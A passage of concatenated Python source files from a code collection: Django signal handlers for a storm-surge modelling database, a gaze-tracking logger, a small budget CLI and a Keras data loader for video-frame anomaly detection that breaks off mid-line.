'dependent_xxx' fields in the\n# parent model 'year'\ndef on_storm_update(sender, **kwargs):\n\n changed_storm = kwargs.pop('instance', None)\n year = changed_storm.year\n\n if year is not None:\n year_storms = sender.objects.all().filter(year=year)\n\n # update the dependent_asgs_dev fields\n year.dependent_asgs_dev = False\n year.dependent_enable_public_dev = False\n year.dependent_enable_adminmode_dev = False\n\n storms_dev = year_storms.filter(dependent_asgs_dev=1)\n if storms_dev.count() > 0:\n year.dependent_asgs_dev = True\n if storms_dev.filter(dependent_enable_public_dev=1).count() > 0:\n year.dependent_enable_public_dev = True\n if storms_dev.filter(dependent_enable_adminmode_dev=1).count() > 0:\n year.dependent_enable_adminmode_dev = True\n\n # update the dependent_asgs_pro fields\n year.dependent_asgs_pro = False\n year.dependent_enable_public_pro = False\n year.dependent_enable_adminmode_pro = False\n\n storms_pro = year_storms.filter(dependent_asgs_pro=1)\n if storms_pro.count() > 0:\n year.dependent_asgs_pro = True\n if storms_pro.filter(dependent_enable_public_pro=1).count() > 0:\n year.dependent_enable_public_pro = True\n if storms_pro.filter(dependent_enable_adminmode_pro=1).count() > 0:\n year.dependent_enable_adminmode_pro = True\n\n # update the dependent_asgs_pub fields\n year.dependent_asgs_pub = False\n year.dependent_enable_public_pub = False\n year.dependent_enable_adminmode_pub = False\n\n storms_pub = year_storms.filter(dependent_asgs_pub=1)\n if storms_pub.count() > 0:\n year.dependent_asgs_pub = True\n if storms_pub.filter(dependent_enable_public_pub=1).count() > 0:\n year.dependent_enable_public_pub = True\n if storms_pub.filter(dependent_enable_adminmode_pub=1).count() > 0:\n year.dependent_enable_adminmode_pub = True\n\n # update the dependent_asgs_nc fields\n year.dependent_asgs_nc = False\n year.dependent_enable_public_nc = False\n year.dependent_enable_adminmode_nc = False\n\n storms_nc = year_storms.filter(dependent_asgs_nc=1)\n if storms_nc.count() > 0:\n year.dependent_asgs_nc = True\n if storms_nc.filter(dependent_enable_public_nc=1).count() > 0:\n year.dependent_enable_public_nc = True\n if storms_nc.filter(dependent_enable_adminmode_nc=1).count() > 0:\n year.dependent_enable_adminmode_nc = True\n\n # update the dependent_asgs_ng fields\n year.dependent_asgs_ng = False\n year.dependent_enable_public_ng = False\n year.dependent_enable_adminmode_ng = False\n\n storms_ng = year_storms.filter(dependent_asgs_ng=1)\n if storms_ng.count() > 0:\n year.dependent_asgs_ng = True\n if storms_ng.filter(dependent_enable_public_ng=1).count() > 0:\n year.dependent_enable_public_ng = True\n if storms_ng.filter(dependent_enable_adminmode_ng=1).count() > 0:\n year.dependent_enable_adminmode_ng = True\n\n # update the dependent_asgs_pr fields\n year.dependent_asgs_pr = False\n year.dependent_enable_public_pr = False\n year.dependent_enable_adminmode_pr = False\n\n storms_pr = year_storms.filter(dependent_asgs_pr=1)\n if storms_pr.count() > 0:\n year.dependent_asgs_pr = True\n if storms_pr.filter(dependent_enable_public_pr=1).count() > 0:\n year.dependent_enable_public_pr = True\n if storms_pr.filter(dependent_enable_adminmode_pr=1).count() > 0:\n year.dependent_enable_adminmode_pr = True\n\n # and update the dependent_asgs_ri fields\n year.dependent_asgs_ri = False\n year.dependent_enable_public_ri = False\n year.dependent_enable_adminmode_ri = False\n\n storms_ri = year_storms.filter(dependent_asgs_ri=1)\n if storms_ri.count() > 0:\n year.dependent_asgs_ri = True\n if storms_ri.filter(dependent_enable_public_ri=1).count() > 0:\n year.dependent_enable_public_ri = True\n if storms_ri.filter(dependent_enable_adminmode_ri=1).count() > 0:\n year.dependent_enable_adminmode_ri = True\n\n # update the dependent_asgs_st fields\n year.dependent_asgs_st = False\n year.dependent_enable_public_st = False\n year.dependent_enable_adminmode_st = False\n\n storms_st = year_storms.filter(dependent_asgs_st=1)\n if storms_st.count() > 0:\n year.dependent_asgs_st = True\n if storms_st.filter(dependent_enable_public_st=1).count() > 0:\n year.dependent_enable_public_st = True\n if storms_st.filter(dependent_enable_adminmode_st=1).count() > 0:\n year.dependent_enable_adminmode_st = True\n\n # update the dependent_region_nc_ng fields\n year.dependent_region_nc_ng = False\n\n storms_nc_ng = year_storms.filter(dependent_asgs_nc=1).filter(dependent_asgs_ng=1)\n if storms_st.count() > 0:\n year.dependent_asgs_st = True\n if storms_st.filter(dependent_enable_public_st=1).count() > 0:\n year.dependent_enable_public_st = True\n if storms_st.filter(dependent_enable_adminmode_st=1).count() > 0:\n year.dependent_enable_adminmode_st = True\n\n #####\n # dependent_region handling\n # dependent_region for pro is nc/ng/nc_ng; no region for dev/st/pub (always nc_ng)\n\n year.dependent_region_nc_ng = False\n storms_region_nc_ng = year_storms.filter(dependent_region_nc_ng = True)\n if storms_region_nc_ng.count() > 0:\n year.dependent_region_nc_ng = True\n\n year.dependent_region_nc = False\n storms_region_nc = year_storms.filter(dependent_region_nc = True)\n if storms_region_nc.count() > 0:\n year.dependent_region_nc = True\n\n year.dependent_region_ng = False\n storms_region_ng = year_storms.filter(dependent_region_ng = True)\n if storms_region_ng.count() > 0:\n year.dependent_region_ng = True\n\n year.dependent_region_pr = False\n storms_region_pr = year_storms.filter(dependent_region_pr = True)\n if storms_region_pr.count() > 0:\n year.dependent_region_pr = True\n\n year.dependent_region_ri = False\n storms_region_ri = year_storms.filter(dependent_region_ri = True)\n if storms_region_ri.count() > 0:\n year.dependent_region_ri = True\n\n year.save(force_update=True)\n\n# register signal handlers for model 'storm'\npost_save.connect(on_storm_update, sender=storm, dispatch_uid=\"storm1\")\npost_delete.connect(on_storm_update, sender=storm, dispatch_uid=\"storm2\")\n\n\n# signal handler will be called on new record/update of a record in\n# model 'advisory' (post_save) and changes the 'dependent_xxx' fields in the\n# parent model 'storm'\ndef on_advisory_update(sender, **kwargs):\n\n changed_advisory = kwargs.pop('instance', None)\n storm = changed_advisory.storm\n\n if storm is not None:\n storm_advs = sender.objects.all().filter(storm=storm)\n\n # update the dependent_asgs_dev fields\n storm.dependent_asgs_dev = False\n storm.dependent_enable_public_dev = False\n storm.dependent_enable_adminmode_dev = False\n\n advisories_dev = storm_advs.filter(dependent_asgs_dev=1)\n if advisories_dev.count() > 0:\n storm.dependent_asgs_dev = True\n if advisories_dev.filter(dependent_enable_public_dev=1).count() > 0:\n storm.dependent_enable_public_dev = True\n if advisories_dev.filter(dependent_enable_adminmode_dev=1).count() > 0:\n storm.dependent_enable_adminmode_dev = True\n\n # update the dependent_asgs_pro fields\n storm.dependent_asgs_pro = False\n storm.dependent_enable_public_pro = False\n storm.dependent_enable_adminmode_pro = False\n\n advisories_pro = storm_advs.filter(dependent_asgs_pro=1)\n if advisories_pro.count() > 0:\n storm.dependent_asgs_pro = True\n if advisories_pro.filter(dependent_enable_public_pro=1).count() > 0:\n storm.dependent_enable_public_pro = True\n if advisories_pro.filter(dependent_enable_adminmode_pro=1).count() > 0:\n storm.dependent_enable_adminmode_pro = True\n\n\t# update the dependent_asgs_pub fields\n storm.dependent_asgs_pub = False\n storm.dependent_enable_public_pub = False\n storm.dependent_enable_adminmode_pub = False\n\n advisories_pub = storm_advs.filter(dependent_asgs_pub=1)\n if advisories_pub.count() > 0:\n storm.dependent_asgs_pub = True\n if advisories_pub.filter(dependent_enable_public_pub=1).count() > 0:\n storm.dependent_enable_public_pub = True\n if advisories_pub.filter(dependent_enable_adminmode_pub=1).count() > 0:\n storm.dependent_enable_adminmode_pub = True\n\n # update the dependent_asgs_nc fields\n storm.dependent_asgs_nc = False\n storm.dependent_enable_public_nc = False\n storm.dependent_enable_adminmode_nc = False\n\n advisories_nc = storm_advs.filter(dependent_asgs_nc=1)\n\n if advisories_nc.count() > 0:\n storm.dependent_asgs_nc = True\n if advisories_nc.filter(dependent_enable_public_nc=1).count() > 0:\n storm.dependent_enable_public_nc = True\n if advisories_nc.filter(dependent_enable_adminmode_nc=1).count() > 0:\n storm.dependent_enable_adminmode_nc = True\n\n # update the dependent_asgs_ng fields\n storm.dependent_asgs_ng = False\n storm.dependent_enable_public_ng = False\n storm.dependent_enable_adminmode_ng = False\n\n advisories_ng = storm_advs.filter(dependent_asgs_ng=1)\n if advisories_ng.count() > 0:\n storm.dependent_asgs_ng = True\n if advisories_ng.filter(dependent_enable_public_ng=1).count() > 0:\n storm.dependent_enable_public_ng = True\n if advisories_ng.filter(dependent_enable_adminmode_ng=1).count() > 0:\n storm.dependent_enable_adminmode_ng = True\n\n # update the dependent_asgs_pr fields\n storm.dependent_asgs_pr = False\n storm.dependent_enable_public_pr = False\n storm.dependent_enable_adminmode_pr = False\n\n advisories_pr = storm_advs.filter(dependent_asgs_pr=1)\n if advisories_pr.count() > 0:\n storm.dependent_asgs_pr = True\n if advisories_pr.filter(dependent_enable_public_pr=1).count() > 0:\n storm.dependent_enable_public_pr = True\n if advisories_pr.filter(dependent_enable_adminmode_pr=1).count() > 0:\n storm.dependent_enable_adminmode_pr = True\n\n # update the dependent_asgs_ri fields\n storm.dependent_asgs_ri = False\n storm.dependent_enable_public_ri = False\n storm.dependent_enable_adminmode_ri = False\n\n advisories_ri = storm_advs.filter(dependent_asgs_ri=1)\n if advisories_ri.count() > 0:\n storm.dependent_asgs_ri = True\n if advisories_ri.filter(dependent_enable_public_ri=1).count() > 0:\n storm.dependent_enable_public_ri = True\n if advisories_ri.filter(dependent_enable_adminmode_ri=1).count() > 0:\n storm.dependent_enable_adminmode_ri = True\n\n # update the dependent_asgs_st fields\n storm.dependent_asgs_st = False\n storm.dependent_enable_public_st = False\n storm.dependent_enable_adminmode_st = False\n\n advisories_st = storm_advs.filter(dependent_asgs_st=1)\n if advisories_st.count() > 0:\n storm.dependent_asgs_st = True\n if advisories_st.filter(dependent_enable_public_st=1).count() > 0:\n storm.dependent_enable_public_st = True\n if advisories_st.filter(dependent_enable_adminmode_st=1).count() > 0:\n storm.dependent_enable_adminmode_st = True\n\n #####\n # dependent_region handling\n # dependent_region for pro is nc/ng/nc_ng; no region for dev/st/pub (always nc_ng)\n\n storm.dependent_region_nc_ng = False\n advisories_region_nc_ng = storm_advs.filter(dependent_region_nc_ng = True)\n if advisories_region_nc_ng.count() > 0:\n storm.dependent_region_nc_ng = True\n\n storm.dependent_region_nc = False\n advisories_region_nc = storm_advs.filter(dependent_region_nc = True)\n if advisories_region_nc.count() > 0:\n storm.dependent_region_nc = True\n\n storm.dependent_region_ng = False\n advisories_region_ng = storm_advs.filter(dependent_region_ng = True)\n if advisories_region_ng.count() > 0:\n storm.dependent_region_ng = True\n\n storm.dependent_region_pr = False\n advisories_region_pr = storm_advs.filter(dependent_region_pr = True)\n if advisories_region_pr.count() > 0:\n storm.dependent_region_pr = True\n\n storm.dependent_region_ri = False\n advisories_region_ri = storm_advs.filter(dependent_region_ri = True)\n if advisories_region_ri.count() > 0:\n storm.dependent_region_ri = True\n\n storm.save(force_update=True)\n\n# register signal handlers for model 'advisory'\npost_save.connect(on_advisory_update, sender=advisory, dispatch_uid=\"adv1\")\npost_delete.connect(on_advisory_update, sender=advisory, dispatch_uid=\"adv2\")\n\n# signal handler will be called on new record/update of a record in\n# model 'track' (post_save) and changes the 'dependent_xxx' fields in the\n# parent model 'advisory'\ndef on_track_update(sender, **kwargs):\n\n changed_track = kwargs.pop('instance', None)\n adv = changed_track.advisory\n\n # query for all tracks of the parent advisory\n if adv is not None:\n advisory_tracks = sender.objects.all().filter(advisory=adv)\n\n # update the dependent_asgs_dev fields\n adv.dependent_asgs_dev = False\n adv.dependent_enable_public_dev = False\n adv.dependent_enable_adminmode_dev = False\n\n tracks_dev = advisory_tracks.filter(dependent_asgs_dev=1)\n if tracks_dev.count() > 0:\n adv.dependent_asgs_dev = True\n if tracks_dev.filter(dependent_enable_public_dev=1).count() > 0:\n adv.dependent_enable_public_dev = True\n if tracks_dev.filter(dependent_enable_adminmode_dev=1).count() > 0:\n adv.dependent_enable_adminmode_dev = True\n\n # update the dependent_asgs_pro fields\n adv.dependent_asgs_pro = False\n adv.dependent_enable_public_pro = False\n adv.dependent_enable_adminmode_pro = False\n\n tracks_pro = advisory_tracks.filter(dependent_asgs_pro=1)\n if tracks_pro.count() > 0:\n adv.dependent_asgs_pro = True\n if tracks_pro.filter(dependent_enable_public_pro=1).count() > 0:\n adv.dependent_enable_public_pro = True\n if tracks_pro.filter(dependent_enable_adminmode_pro=1).count() > 0:\n adv.dependent_enable_adminmode_pro = True\n\n # update the dependent_asgs_pub fields\n adv.dependent_asgs_pub = False\n adv.dependent_enable_public_pub = False\n adv.dependent_enable_adminmode_pub = False\n\n tracks_pub = advisory_tracks.filter(dependent_asgs_pub=1)\n if tracks_pub.count() > 0:\n adv.dependent_asgs_pub = True\n if tracks_pub.filter(dependent_enable_public_pub=1).count() > 0:\n adv.dependent_enable_public_pub = True\n if tracks_pub.filter(dependent_enable_adminmode_pub=1).count() > 0:\n adv.dependent_enable_adminmode_pub = True\n\n # update the dependent_asgs_nc fields\n adv.dependent_asgs_nc = False\n adv.dependent_enable_public_nc = False\n adv.dependent_enable_adminmode_nc = False\n\n tracks_nc = advisory_tracks.filter(dependent_asgs_nc=1)\n if tracks_nc.count() > 0:\n adv.dependent_asgs_nc = True\n if tracks_nc.filter(dependent_enable_public_nc=1).count() > 0:\n adv.dependent_enable_public_nc = True\n if tracks_nc.filter(dependent_enable_adminmode_nc=1).count() > 0:\n adv.dependent_enable_adminmode_nc = True\n\n # update the dependent_asgs_ng fields\n adv.dependent_asgs_ng = False\n adv.dependent_enable_public_ng = False\n adv.dependent_enable_adminmode_ng = False\n\n tracks_ng = advisory_tracks.filter(dependent_asgs_ng=1)\n if tracks_ng.count() > 0:\n adv.dependent_asgs_ng = True\n if tracks_ng.filter(dependent_enable_public_ng=1).count() > 0:\n adv.dependent_enable_public_ng = True\n if tracks_ng.filter(dependent_enable_adminmode_ng=1).count() > 0:\n adv.dependent_enable_adminmode_ng = True\n\n # update the dependent_asgs_pr fields\n adv.dependent_asgs_pr = False\n adv.dependent_enable_public_pr = False\n adv.dependent_enable_adminmode_pr = False\n\n tracks_pr = advisory_tracks.filter(dependent_asgs_pr=1)\n if tracks_pr.count() > 0:\n adv.dependent_asgs_pr = True\n if tracks_pr.filter(dependent_enable_public_pr=1).count() > 0:\n adv.dependent_enable_public_pr = True\n if tracks_pr.filter(dependent_enable_adminmode_pr=1).count() > 0:\n adv.dependent_enable_adminmode_pr = True\n\n # update the dependent_asgs_ri fields\n adv.dependent_asgs_ri = False\n adv.dependent_enable_public_ri = False\n adv.dependent_enable_adminmode_ri = False\n\n tracks_ri = advisory_tracks.filter(dependent_asgs_ri=1)\n if tracks_ri.count() > 0:\n adv.dependent_asgs_ri = True\n if tracks_ri.filter(dependent_enable_public_ri=1).count() > 0:\n adv.dependent_enable_public_ri = True\n if tracks_ri.filter(dependent_enable_adminmode_ri=1).count() > 0:\n adv.dependent_enable_adminmode_ri = True\n\n # update the dependent_asgs_st fields\n adv.dependent_asgs_st = False\n adv.dependent_enable_public_st = False\n adv.dependent_enable_adminmode_st = False\n\n tracks_st = advisory_tracks.filter(dependent_asgs_st=1)\n if tracks_st.count() > 0:\n adv.dependent_asgs_st = True\n if tracks_st.filter(dependent_enable_public_st=1).count() > 0:\n adv.dependent_enable_public_st = True\n if tracks_st.filter(dependent_enable_adminmode_st=1).count() > 0:\n adv.dependent_enable_adminmode_st = True\n\n #####\n # dependent_region handling\n # dependent_region for pro is nc/ng/nc_ng; no region for dev/st/pub (always nc_ng)\n\n adv.dependent_region_nc_ng = False\n tracks_region_nc_ng = advisory_tracks.filter(dependent_region_nc_ng = True)\n if tracks_region_nc_ng.count() > 0:\n adv.dependent_region_nc_ng = True\n\n adv.dependent_region_nc = False\n tracks_region_nc = advisory_tracks.filter(dependent_region_nc = True)\n if tracks_region_nc.count() > 0:\n adv.dependent_region_nc = True\n\n adv.dependent_region_ng = False\n tracks_region_ng = advisory_tracks.filter(dependent_region_ng = True)\n if tracks_region_ng.count() > 0:\n adv.dependent_region_ng = True\n\n adv.dependent_region_pr = False\n tracks_region_pr = advisory_tracks.filter(dependent_region_pr = True)\n if tracks_region_pr.count() > 0:\n adv.dependent_region_pr = True\n\n adv.dependent_region_ri = False\n tracks_region_ri = advisory_tracks.filter(dependent_region_ri = True)\n if tracks_region_ri.count() > 0:\n adv.dependent_region_ri = True\n \n adv.has_model_run = True\n adv.save(force_update=True)\n\n# register signal handlers for model 'track'\npost_save.connect(on_track_update, sender=track, dispatch_uid=\"track1\")\npost_delete.connect(on_track_update, sender=track, dispatch_uid=\"track2\")\n\n\n# signal handler will be called on new record/update of a record in\n# model 'adcrun_info' (post_save) and changes the 'dependent_xxx' fields\n# in the model 'track'\ndef on_adcrun_info_update(sender, **kwargs):\n\n changed_adcruninfo = kwargs.pop('instance', None)\n trk = changed_adcruninfo.track_id\n\n # query for all infos of the parent track\n if trk is not None:\n track_adcrun_infos = sender.objects.all().filter(track_id=trk)\n\n # update the dependent_asgs_dev fields\n trk.dependent_asgs_dev = False\n trk.dependent_enable_public_dev = False\n trk.dependent_enable_adminmode_dev = False\n\n adcruns_dev = track_adcrun_infos.filter(asgs_dev=1)\n if adcruns_dev.count() > 0:\n trk.dependent_asgs_dev = True\n if adcruns_dev.filter(enable_public=1).count() > 0:\n trk.dependent_enable_public_dev = True\n if adcruns_dev.filter(enable_adminmode=1).count() > 0:\n trk.dependent_enable_adminmode_dev = True\n\n # update the dependent_asgs_pro fields\n trk.dependent_asgs_pro = False\n trk.dependent_enable_public_pro = False\n trk.dependent_enable_adminmode_pro = False\n\n adcruns_pro = track_adcrun_infos.filter(asgs_pro=1)\n if adcruns_pro.count() > 0:\n trk.dependent_asgs_pro = True\n if adcruns_pro.filter(enable_public=1).count() > 0:\n trk.dependent_enable_public_pro = True\n if adcruns_pro.filter(enable_adminmode=1).count() > 0:\n trk.dependent_enable_adminmode_pro = True\n\n # update the dependent_asgs_pub fields\n trk.dependent_asgs_pub = False\n trk.dependent_enable_public_pub = False\n trk.dependent_enable_adminmode_pub = False\n\n adcruns_pub = track_adcrun_infos.filter(asgs_pub=1)\n if adcruns_pub.count() > 0:\n trk.dependent_asgs_pub = True\n if adcruns_pub.filter(enable_public=1).count() > 0:\n trk.dependent_enable_public_pub = True\n if adcruns_pub.filter(enable_adminmode=1).count() > 0:\n trk.dependent_enable_adminmode_pub = True\n\n # update the dependent_asgs_nc fields\n trk.dependent_asgs_nc = False\n trk.dependent_enable_public_nc = False\n trk.dependent_enable_adminmode_nc = False\n\n adcruns_nc = track_adcrun_infos.filter(asgs_nc=1)\n if adcruns_nc.count() > 0:\n trk.dependent_asgs_nc = True\n if adcruns_nc.filter(enable_public=1).count() > 0:\n trk.dependent_enable_public_nc = True\n if adcruns_nc.filter(enable_adminmode=1).count() > 0:\n trk.dependent_enable_adminmode_nc = True\n\n # update the dependent_asgs_ng fields\n trk.dependent_asgs_ng = False\n trk.dependent_enable_public_ng = False\n trk.dependent_enable_adminmode_ng = False\n\n adcruns_ng = track_adcrun_infos.filter(asgs_ng=1)\n if adcruns_ng.count() > 0:\n trk.dependent_asgs_ng = True\n if adcruns_ng.filter(enable_public=1).count() > 0:\n trk.dependent_enable_public_ng = True\n if adcruns_ng.filter(enable_adminmode=1).count() > 0:\n trk.dependent_enable_adminmode_ng = True\n\n # update the dependent_asgs_pr fields\n trk.dependent_asgs_pr = False\n trk.dependent_enable_public_pr = False\n trk.dependent_enable_adminmode_pr = False\n\n adcruns_pr = track_adcrun_infos.filter(asgs_pr=1)\n if adcruns_pr.count() > 0:\n trk.dependent_asgs_pr = True\n if adcruns_pr.filter(enable_public=1).count() > 0:\n trk.dependent_enable_public_pr = True\n if adcruns_pr.filter(enable_adminmode=1).count() > 0:\n trk.dependent_enable_adminmode_pr = True\n\n # and update the dependent_asgs_ri of the parent track\n trk.dependent_asgs_ri = False\n trk.dependent_enable_public_ri = False\n trk.dependent_enable_adminmode_ri = False\n\n adcruns_ri = track_adcrun_infos.filter(asgs_ri=1)\n if adcruns_ri.count() > 0:\n trk.dependent_asgs_ri = True\n if adcruns_ri.filter(enable_public=1).count() > 0:\n trk.dependent_enable_public_ri = True\n if adcruns_ri.filter(enable_adminmode=1).count() > 0:\n trk.dependent_enable_adminmode_ri = True\n\n # and update the dependent_asgs_st of the parent track\n trk.dependent_asgs_st = False\n trk.dependent_enable_public_st = False\n trk.dependent_enable_adminmode_st = False\n\n adcruns_st = track_adcrun_infos.filter(asgs_st=1)\n if adcruns_st.count() > 0:\n trk.dependent_asgs_st = True\n if adcruns_st.filter(enable_public=1).count() > 0:\n trk.dependent_enable_public_st = True\n if adcruns_st.filter(enable_adminmode=1).count() > 0:\n trk.dependent_enable_adminmode_st = True\n\n #####\n # dependent_region handling\n # dependent_region for pro is nc/ng/nc_ng; no region for dev/st/pub (always nc_ng)\n\n trk.dependent_region_nc_ng = False\n adcruns_region_nc_ng = track_adcrun_infos.filter(website_region='nc_ng')\n if adcruns_region_nc_ng.count() > 0:\n trk.dependent_region_nc_ng = True\n\n trk.dependent_region_nc = False\n adcruns_region_nc = track_adcrun_infos.filter(website_region='nc')\n if adcruns_region_nc.count() > 0:\n trk.dependent_region_nc = True\n\n trk.dependent_region_ng = False\n adcruns_region_ng = track_adcrun_infos.filter(website_region='ng')\n if adcruns_region_ng.count() > 0:\n trk.dependent_region_ng = True\n\n trk.dependent_region_pr = False\n adcruns_region_pr = track_adcrun_infos.filter(website_region='pr')\n if adcruns_region_pr.count() > 0:\n trk.dependent_region_pr = True\n\n trk.dependent_region_ri = False\n adcruns_region_ri = track_adcrun_infos.filter(website_region='ri')\n if adcruns_region_ri.count() > 0:\n trk.dependent_region_ri = True\n \n trk.has_model_run = True\n trk.save(force_update=True)\n\n##########################################################################\n# This will be called before a record is saved to the database. It's used\n# here to handle changed is_pseudo field values for the record being saved.\ndef on_adcrun_info_presave(sender, **kwargs):\n\n new_adcruninfo = kwargs.pop('instance', None)\n old_adcruninfo = sender.objects.all().filter(id=new_adcruninfo.id)\n\n if len(old_adcruninfo) == 0:\n return # new record, nothing to do\n\n old_adcruninfo = old_adcruninfo[0]\n if old_adcruninfo.is_pseudo == new_adcruninfo.is_pseudo:\n return # is_pseudo has not changed, nothing to do\n\n # dependent records for new adcinfo\n new_track = new_adcruninfo.track_id\n new_advisory = new_track.advisory\n new_storm = new_advisory.storm\n new_year = new_storm.year\n\n # handle case when record does not represent a pseudo storm anymore\n year = int(new_year.year)\n if old_adcruninfo.is_pseudo:\n if year >= 90000:\n year = year - 90000\n thistrack = create_storm_records(year, \\\n new_storm.storm_number, new_storm.stormname, new_storm.start_date_utc, \\\n new_advisory.advisory, new_advisory.stormclass, \\\n new_advisory.category, new_advisory.adv_time_utc, \\\n new_track.track, new_track.mod_percent)\n\n # handle case when record has now to represent a pseudo storm\n elif new_adcruninfo.is_pseudo:\n if year < 90000:\n year = year + 90000\n thistrack = create_storm_records(year, \\\n new_storm.storm_number, new_storm.stormname, new_storm.start_date_utc, \\\n new_advisory.advisory, new_advisory.stormclass, \\\n new_advisory.category, new_advisory.adv_time_utc, \\\n new_track.track, new_track.mod_percent)\n\n new_adcruninfo.track_id = thistrack\n\n return\n\n###############################################################################\n# register signal handlers\npre_save.connect(on_adcrun_info_presave, sender=adcrun_info, dispatch_uid=\"adcrun1\")\npost_save.connect(on_adcrun_info_update, sender=adcrun_info, dispatch_uid=\"adcrun2\")\npost_delete.connect(on_adcrun_info_update, sender=adcrun_info, dispatch_uid=\"adcrun3\")\npost_save.connect(create_profile, sender=User)\n\n","sub_path":"django/cerarisk/cera_data/adcircrun/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":69035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"629412766","text":"import os\nimport time\ngp = __import__(\"gazepoint.gazepoint\")\n\n\ndef main(interface, resolution):\n # Gazepoint Control must be opened for tracking to work\n print(\"Import successful\")\n gazetracker = gp.gazepoint.GazePoint()\n tile_generator = interface.tile_generator\n canvas = interface.canvas\n box_coords = interface.box_coords\n folder_path = tile_generator.folder_path\n\n current_level = tile_generator.level\n previous_level = current_level\n\n canvas_start_x = canvas.winfo_rootx()\n canvas_start_y = canvas.winfo_rooty()\n canvas_end_x = canvas_start_x + canvas.winfo_reqwidth()\n canvas_end_y = canvas_start_y + canvas.winfo_reqheight()\n\n csv_output = open(os.path.join(folder_path, \"Level \" + str(current_level) + \".csv\"), \"a\")\n\n while interface.is_tracking:\n box_coords = interface.box_coords\n previous_level = current_level\n current_level = tile_generator.level\n\n # if the level changes, close the old csv and open a new csv file\n if previous_level != current_level:\n csv_output.close()\n csv_output = open(os.path.join(folder_path, \"Level \" + str(current_level) + \".csv\"), \"a\")\n\n x, y = gazetracker.get_gaze_position()\n # returns a tuple with a value between 0 and 1, can also be negative if looking outside the screen\n if x is not None and y is not None:\n x *= resolution[0]\n y *= resolution[1]\n\n if x >= canvas_start_x and y >= canvas_start_y and x <= canvas_end_x and y <= canvas_end_y:\n # position of canvas on screen is subtracted so that\n # we can consider the top left of the viewer as the origin\n x = x - canvas_start_x + box_coords[0]\n y = y - canvas_start_y + box_coords[1]\n csv_output.write(str(int(x)) + \",\" + str(int(y)) + \"\\n\")\n\n time.sleep(0.1)\n\n csv_output.close()\n gazetracker.stop()\n","sub_path":"tracking.py","file_name":"tracking.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"22329172","text":"#!/usr/bin/env python\n\"\"\"\nUsage:\n budget \n\"\"\"\n\nfrom docopt import docopt\nimport BudgetData\n\n\ndef main(args):\n budget = BudgetData.Budget(args.get(\"\"))\n budget.process(args.get(\"\"))\n budget.report()\n return\n\nif __name__ == '__main__':\n args = docopt(__doc__)\n main(args)\n","sub_path":"budget.py","file_name":"budget.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"387706014","text":"import matplotlib.image as mpimg\nimport numpy as np\nfrom keras.utils import Sequence, to_categorical\n\n\nclass DataLoader():\n \n def __init__(self, train_file, test_file, frames_count, frames_step, validation_split=0.0):\n self.train_file = train_file\n self.test_file = test_file\n self.validation_split = validation_split\n self.frames_count = frames_count\n self.frames_step = frames_step\n\n if self.validation_split < 0 or self.validation_split > 1:\n raise \"Invalid validation_split\"\n\n self.read_files()\n self.split()\n\n def read_files(self):\n # Training data\n with open(self.train_file, 'r') as f:\n training_path = [f for f in map(lambda s: s.strip(),f.readlines())]\n\n self.train_videos = {}\n for path in training_path:\n split = path.split('/')\n video = '/'.join(split[:-1])\n frame = split[-1]\n\n if self.train_videos.get(video) is None:\n self.train_videos[video] = []\n\n self.train_videos[video].append(frame)\n\n # Test data\n with open(self.test_file, 'r') as f:\n test_path = [f for f in map(lambda s: tuple(s.strip().split()),f.readlines())]\n \n self.test_videos = {}\n self.normal_frames = {}\n self.abnormal_frames = {}\n\n for (path, abnormal) in test_path:\n split = path.split('/')\n video = '/'.join(split[:-1])\n frame = split[-1]\n\n if self.test_videos.get(video) is None:\n self.test_videos[video] = []\n\n self.test_videos[video].append(frame)\n if int(abnormal):\n if self.abnormal_frames.get(video) is None:\n self.abnormal_frames[video] = []\n self.abnormal_frames[video].append(frame)\n else:\n if self.normal_frames.get(video) is None:\n self.normal_frames[video] = []\n self.normal_frames[video].append(frame)\n\n\n def split(self):\n if self.validation_split > 0:\n n = len(self.train_videos)\n num_val = int(n * self.validation_split)\n num_train = n - num_val\n\n keys = np.array(list(self.train_videos.keys()))\n val_idx = np.random.choice(range(0, n), num_val, replace=False)\n\n val_keys = keys[val_idx]\n train_keys = np.delete(keys, val_idx, axis=0)\n\n videos = self.train_videos\n self.train_videos = {}\n self.validation_videos = {}\n\n for k in train_keys:\n self.train_videos[k] = videos[k]\n for k in val_keys:\n self.validation_videos[k] = videos[k]\n\n def train_generator(self, **kwargs):\n prefix = '/'.join(self.train_file.split('/')[:-1]) + '/'\n return DataGenerator(self.train_videos, sequenceLength=self.frames_count, sequenceStep=self.frames_step, pathPrefix=prefix, **kwargs)\n\n def validation_generator(self, **kwargs):\n if self.validation_split == 0.0:\n raise \"Validation split set to zero !\"\n prefix = '/'.join(self.train_file.split('/')[:-1]) + '/'\n return DataGenerator(self.validation_videos, sequenceLength=self.frames_count, sequenceStep=self.frames_step, pathPrefix=prefix, **kwargs)\n\n def test_generator(self, only_normal=None, **kwargs):\n # if only_normal None : every test sequences\n # if only_normal true : only sequences with normal at the end\n # if only_normal false : only sequences with abnormal at the end\n\n prefix = '/'.join(self.test_file.split('/')[:-1]) + '/'\n f = None\n if only_normal is not None:\n f = self.normal_frames if only_normal else self.abnormal_frames\n return DataGenerator(self.test_videos, sequenceLength=self.frames_count, sequenceStep=self.frames_step, pathPrefix=prefix, data_filter=f, **kwargs)\n\nclass DataGenerator(Sequence):\n 'Generates data for Keras'\n def __init__(self, videos, sequenceLength=10, sequenceStep=1, batch_size=32, shuffle=True, pathPrefix='', data_filter=None, filter_ratio=1):\n 'Initialization'\n self.videos = videos\n self.sequenceLength = sequenceLength\n self.sequenceStep = sequenceStep\n self.batch_size = batch_size\n self.shuffle = shuffle\n self.pathPrefix = pathPrefix\n\n self.data = []\n self.totalLength = 0\n\n self.totalSequenceLength = self.sequenceStep * (self.sequenceLength - 1) + 1\n\n for key, frames in self.videos.items():\n self.totalLength += len(frames)\n\n choice = []\n if data_filter is None:\n choice = list(map(lambda pos: (key, pos), range(len(frames[:-self.totalSequenceLength+1]))))\n elif data_filter.get(key) is not None:\n for pos in range(len(frames[:-self.totalSequenceLength+1])):\n count = 0\n for j in range(pos, pos+self.totalSequenceLength):\n if frames[j] in data_filter.get(key):\n count += 1\n\n if count >= self.totalSequenceLength * filter_ratio:\n choice.append((key, 